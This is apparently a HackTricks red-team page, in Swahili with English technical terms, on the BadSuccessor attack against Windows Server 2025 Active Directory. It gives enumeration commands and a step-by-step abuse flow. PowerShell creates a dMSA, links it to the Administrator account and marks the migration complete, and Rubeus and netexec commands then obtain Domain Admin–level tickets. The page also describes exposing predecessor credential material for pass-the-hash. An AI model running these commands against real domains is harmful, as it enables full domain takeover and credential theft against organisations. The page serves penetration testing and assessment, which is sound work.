BadSuccessor
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).
Support HackTricks
- Angalia subscription plans!
- Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
- Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.
Muhtasari
BadSuccessor hutumia vibaya mtiririko wa uhamiaji wa delegated Managed Service Account (dMSA) ulioanzishwa katika Windows Server 2025. dMSA inaweza kuunganishwa na akaunti ya zamani kupitia msDS-ManagedAccountPrecededByLink na kuhamishwa kupitia hali za uhamiaji zilizohifadhiwa kwenye msDS-DelegatedMSAState. Kama mshambulizi anaweza kuunda dMSA ndani ya OU inayoweza kuandikwa na kudhibiti sifa hizo, KDC inaweza kutoa tickets kwa dMSA inayodhibitiwa na mshambulizi ikiwa na authorization context ya akaunti iliyounganishwa.
Kwa vitendo, hii inamaanisha mtumiaji mwenye mamlaka ya chini ambaye ana tu delegated OU rights anaweza kuunda dMSA mpya, kuiweka kwa Administrator, kukamilisha state ya uhamiaji, kisha kupata TGT ambayo PAC yake ina vikundi vya mamlaka kama Domain Admins.
Maelezo ya uhamiaji ya dMSA yanayohusika
- dMSA ni kipengele cha Windows Server 2025.
Start-ADServiceAccountMigrationhuweka uhamiaji kwenye hali ya started.Complete-ADServiceAccountMigrationhuweka uhamiaji kwenye hali ya completed.msDS-DelegatedMSAState = 1humaanisha uhamiaji umeanza.msDS-DelegatedMSAState = 2humaanisha uhamiaji umekamilika.- Wakati wa uhamiaji halali, dMSA inakusudiwa kuchukua nafasi ya akaunti iliyopita bila kuonekana, hivyo KDC/LSA huhifadhi access ambayo akaunti ya awali tayari ilikuwa nayo.
Microsoft Learn pia inaeleza kwamba wakati wa uhamiaji akaunti ya asili hufungwa na dMSA na dMSA inakusudiwa kufikia kile ambacho akaunti ya zamani ingeweza kufikia. Huu ndio msingi wa usalama ambao BadSuccessor hutumia vibaya.
Mahitaji
- Domain ambamo dMSA ipo, yaani kuna usaidizi wa Windows Server 2025 upande wa AD.
- Mshambulizi anaweza kuunda vitu vya
msDS-DelegatedManagedServiceAccountkatika baadhi ya OU, au ana broad child-object creation rights sawia huko. - Mshambulizi anaweza kuandika sifa husika za dMSA au kudhibiti kikamilifu dMSA aliyoitengeneza hivi karibuni.
- Mshambulizi anaweza kuomba Kerberos tickets kutoka context iliyo domain-joined au kutoka kwenye tunnel inayofika LDAP/Kerberos.
Ukaguzi wa vitendo
Ishara safi zaidi kwa operator ni kuthibitisha domain/forest level na kuhakikisha environment tayari inatumia stack mpya ya Server 2025:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
Iwapo utaona thamani kama Windows2025Domain na Windows2025Forest, chukulia BadSuccessor / dMSA migration abuse kama ukaguzi wa kipaumbele.
Unaweza pia kuorodhesha OUs zinazoweza kuandikwa zilizopewa mamlaka kwa uundaji wa dMSA kwa kutumia zana za umma:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Mtiririko wa matumizi mabaya
- Tengeneza dMSA katika OU ambapo una delegated create-child rights.
- Weka
msDS-ManagedAccountPrecededByLinkkuwa DN ya target yenye privilege kamaCN=Administrator,CN=Users,DC=corp,DC=local. - Weka
msDS-DelegatedMSAStatekuwa2ili kuashiria kwamba uhamishaji umekamilika. - Omba TGT kwa dMSA mpya na tumia ticket iliyorejeshwa kufikia privileged services.
Mfano wa PowerShell:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Omba la tiketi / mifano ya zana za kiutendaji:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
Kwa nini hili ni zaidi ya privilege escalation
Wakati wa uhamiaji halali, Windows pia huhitaji dMSA mpya kushughulikia tickets ambazo zilitolewa kwa account ya awali kabla ya cutover. Ndiyo maana dMSA-related ticket material inaweza kujumuisha keys za sasa na zamani katika mtiririko wa KERB-DMSA-KEY-PACKAGE.
Kwa fake migration inayodhibitiwa na attacker, tabia hiyo inaweza kugeuza BadSuccessor kuwa:
- Privilege escalation kwa kurithi privileged group SIDs katika PAC.
- Credential material exposure kwa sababu previous-key handling inaweza kufichua material inayolingana na RC4/NT hash ya predecessor katika vulnerable workflows.
Hilo linafanya technique kuwa muhimu kwa direct domain takeover na pia kwa follow-on operations kama pass-the-hash au wider credential compromise.
Maelezo kuhusu hali ya patch
Tabia ya awali ya BadSuccessor si tu issue ya kinadharia ya preview ya 2025. Microsoft ilipeleka CVE-2025-53779 na kuchapisha security update mnamo Agosti 2025. Hifadhi attack hii kama ilivyoandikwa kwa:
- labs / CTFs / assume-breach exercises
- unpatched Windows Server 2025 environments
- uthibitishaji wa OU delegations na dMSA exposure wakati wa assessments
Usidhani domain ya Windows Server 2025 iko vulnerable kwa sababu tu dMSA ipo; thibitisha kiwango cha patch na ujaribu kwa uangalifu.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).
Support HackTricks
- Angalia subscription plans!
- Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
- Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.


